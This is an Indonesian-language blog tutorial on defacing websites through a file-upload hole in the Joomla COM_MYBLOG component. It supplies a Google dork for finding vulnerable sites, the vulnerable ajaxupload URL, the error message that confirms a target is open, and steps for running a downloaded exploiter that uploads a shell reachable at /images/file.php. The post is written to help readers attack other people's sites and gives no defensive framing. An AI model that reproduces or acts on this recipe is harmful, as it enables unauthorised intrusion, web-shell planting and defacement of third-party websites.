Deface Dengan Joomla COM_MYBLOG Exploit

Dihari yang berbahagia ini, ane mau share cara deface dengan Com_Myblog, exploit Com_Myblog ini terdapat pada CMS Joomla.

  • Google Dork : inurl:"/components/com_myblog/"
  • Exploit : /index.php?option=com_myblog&task=ajaxupload
  • Exploiter : Download Here!
  • Jika mendapatkan error seperti dibawah ini, maka target tersebut vuln.
    { error: 'No file has been uploaded.', msg: '' }

  • Yang pertama download exploiternya, ganti target yang ada didalam script nya.
    Untuk windows jalankan di xampp, kalau linux tinggal jalanin aja.

  • Untuk mengakses file/shell/script deface nya di target.com/images/file.php


Oke sekian dulu tutorial hari ini, semoga dapat menambah ilmu sobat. Terimakasih sudah berkunjung ^_^


EmoticonEmoticon